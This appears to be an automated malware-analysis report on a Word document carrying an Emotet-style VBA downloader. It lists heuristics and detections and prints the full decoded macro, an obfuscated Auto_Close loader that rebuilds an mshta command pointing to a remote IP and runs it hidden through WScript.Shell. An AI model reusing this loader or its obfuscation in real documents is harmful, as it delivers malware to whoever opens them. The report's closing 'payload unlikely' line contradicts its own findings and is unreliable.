Verdict: MALICIOUS
Risk Score: 322
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a critical heuristic firing for an obfuscated auto-exec VBA loader, specifically an Auto_Close macro that uses CreateObject to execute code. The VBA script attempts to download a payload from the URL "http://198.55.107.156/oxYNPkSZMKNHU/cRkVvbUViWjNojWFRWxEgTwxzxgkoUYkriFUxYNPkSZMKNHU.php?uojWFRWxEgTwxxYNPkSZMKNHUBLziTwFpEnWR=hond". This indicates downloader or dropper functionality.
Heuristics (7)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, 4 related findings, OOXML_VBA): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All extracted URLs were labelled "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2775 bytes |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 13312 bytes |

macros.bas
SHA-256: 5a0dc6d28b39edd6fdacdbb0d72df1c96c79ba25e90a5d6c56cca3bc38bdbac5

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub caatinga()
OfRXDZvYcEv = "G" & Trim("M") & Trim("P") & "C"
buvdHSM = 1508 - 1784 - 176
viRRiLSNG = 1338 + 180 + 743 + 1583
KJOIxjbZyQ = 687 + 413 + 274 + 1888
XcpnDWZcEi = 723 - 1342 - 1828 - 1766 - 1679 - 529
curvo = "xYNPkSZMKNHUcRkVvbUViWjNhojWFRWxEgTwxBLziTwFpEnWR hojWFRWxEgTwxojWFRWxEgTwxp://198.55.107.156/oxYNPkSZMKNHUxYNPkSZMKNHU/cRkVvbUViWjNojWFRWxEgTwxzxgkoUYkriFUxYNPkSZMKNHU.php?uojWFRWxEgTwxxYNPkSZMKNHUBLziTwFpEnWR=hond"
curvo = Replace(curvo, "xYNPkSZMKNHU", "m")
HQGiqEPbBRxi = 1738 - 332 - 1152 - 1158 - 1249 - 1761
GuFwrnn = 674 + 1279 + 1425 + 980 + 2000
MAWXiyQi = 1093 + 1292 + 1385 + 1800 + 1657 + 258
curvo = Replace(curvo, "BLziTwFpEnWR", "a")
VvWEgPoj = "V" & Trim("j") & "o" & "O" & "R"
curvo = Replace(curvo, "cRkVvbUViWjN", "s")
curvo = Replace(curvo, "ojWFRWxEgTwx", "t")
qOkOSCObZ = Trim("E") & "Z" & "o" & Trim("O")
curvo = Replace(curvo, "zxgkoUYkriFU", "e")
wDCUVbC = "K" & "x" & "H" & "I"
PVQqwCn = 1868 + 1994 + 197 + 2 + 1367
cxdqLTc = Trim("n") & Trim("r")
qHVEJEEYNBo = Trim("N") & "f" & "W" & "c" & "V"
curvo = Replace(curvo, "pFRgUFwrZHgE", "l")
bcuMXBKDUxB = "K" & "P" & "C" & Trim("q")
WzTWYbALFkzL = Trim("H") & "O" & "b" & Trim("J")
iJJqrqoEQR = Trim("k") & "K" & "J"
gibi = "WScripQKqTiqiCXNZG.ShUyPMRDryHoZSNvdHduucgNnyNvdHduucgNny"
gibi = Replace(gibi, "CVnYNrNFxnpf", "m")
gibi = Replace(gibi, "KJAdRFyDdkJy", "a")
pVLVqHz = "r" & Trim("S") & Trim("A") & Trim("y")
PWzFHZU = 996 - 339 - 608 - 1481 - 1325 - 696 - 1836
DLYQuCoYiP = 1051 - 557 - 1450 - 1345 - 48 - 1051
gibi = Replace(gibi, "onibgpNgWyNf", "s")
gibi = Replace(gibi, "QKqTiqiCXNZG", "t")
gibi = Replace(gibi, "UyPMRDryHoZS", "e")
gibi = Replace(gibi, "NvdHduucgNny", "l")
iNLDfxI = Trim("v") & "Q" & "S"
ZkLobjjT = 404 + 26 + 18 + 372 + 269 + 1574
CreateObject(gibi).Run curvo, 0
DATEdKC = "q" & Trim("b") & Trim("A") & "f"
RRNZfpq = 1666 + 1871 + 278 + 1410
qrTVBfbFFrXq = 1495 - 776 - 1181 - 1108 - 393
pKFIbPKUYqA = 679 - 704 - 243 - 321 - 397 - 1871
YRELYnbqM = 328 + 1441 + 208 + 280
End Sub
Sub AutoClose()
NFdJLCxSOyd = 166 + 720 + 836 + 411 + 783 + 224
yQDCGwBUu = 991 - 914 - 1789 - 140 - 928 - 1050
HjKgyRN = 1095 - 624 - 772 - 1532
KULDPzxk = 720 - 1598 - 455
Application.Run "caatinga"
QOgiPHJ = "j" & Trim("O")
HXBPTLNkP = "N" & Trim("V") & "K" & "M" & Trim("Y")
KrLcWJFIIdV = 735 + 1811 + 983 + 1808
BzrJbdRqKSjf = Trim("F") & Trim("w") & Trim("u") & "R" & "C"
End Sub
```

vbaProject_00.bin
SHA-256: 0212a12ca122993b74ecf4e3439115ea95d97a8814b17c78715735eb2bcee60a

Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely